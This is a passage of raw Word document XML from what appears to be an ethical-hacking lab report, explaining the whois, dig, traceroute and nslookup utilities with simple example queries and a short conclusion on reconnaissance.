        <w:t xml:space="preserve">versions of whois try to guess the right server to ask for the specified object. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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65">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="159.96096" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtaining the domain WHOIS record for computersolutions.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="159.96096" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="159.96096" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS record by IP querying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="159.96096" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="159.96096" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying WHOIS in google search engine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5676900" cy="4995038"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:wrapNone/>
            <wp:docPr id="23" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="-86624"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5676900" cy="4995038"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5662613" cy="2323123"/>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62613" cy="232312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t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dig (Domain Information Groper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dig is a networking tool that can query DNS servers for information. It</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be very helpful for diagnosing problems with domain pointing and is a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">good way to verify that your configuration is working.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most basic way to use dig is to specify the domain we wish to query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dig example.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3429000"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="1270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42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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute prints the route that packets take to a network host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute utility uses the TTL field in the IP header to achieve its operation. For</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users who are new to TTL field, this field describes how much hops a particular</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">packet will take while traveling on the network. So, this effectively outlines the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lifetime of the packet on the network. This field is usually set to 32 or 64. Each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when the packet is held on an intermediate router, it decreases the TTL value by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When a router finds the TTL value of 1 in a received packet then that packet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is not forwarded but instead discarded. After discarding the packet, router</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sends an ICMP error message of ―Time exceeded back to the source from</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where the packet was generated. The ICMP packet that is sent back contains the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address of the router. So now it can be easily understood that traceroute operates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by sending packets with TTL value starting from 1 and then incrementing by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one each time. Each time a router receives the packet, it checks the TTL field, if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTL field is 1 then it discards the packet and sends the ICMP error packet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">containing its IP address and this is what traceroute requires. So traceroute incrementally fetches the IP of all the routers between the source and the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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6">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7">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8">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9">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A">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B">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C">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D">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E">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9F">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0">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1">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2">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: traceroute example.com</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180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6010275" cy="7401734"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="-42323"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6010275" cy="7401734"/>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6010275" cy="2209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>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010275" cy="2209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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4">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5">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6">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7">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8">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9">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A">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B">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C">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D">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E">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AF">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0">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1">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2">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3">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4">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5">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6">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7">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8">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9">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A">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B">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C">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D">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E">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BF">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0">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1">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2">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3">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4">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5">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6">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7">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8">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9">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A">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B">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C">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D">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E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000009"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nslookup (Name Server Lookup):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The nslookup command is used to query internet name servers interactively for information. nslookup, which stands for "name server lookup", is a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">useful tool for finding out information about a named domain. By default, nslookup will translate a domain name to an IP address (or vice versa). For instance, to find out what the IP address of microsoft.com is, you could run the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup microsoft.com</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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="1924050"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="1270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29200" cy="192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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this experiment you learned how to take the first steps toward ethical hacking. Information gathering, in the form of reconnaissance, foot printing, and social engineering is necessary to learn as much about the target as possible. By following the information-gathering methodology, ethical hackers can ensure they are not missing any steps and valuable information.Time spent in the information- gathering phase is well worth it to speed up and produce successful hacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>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rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
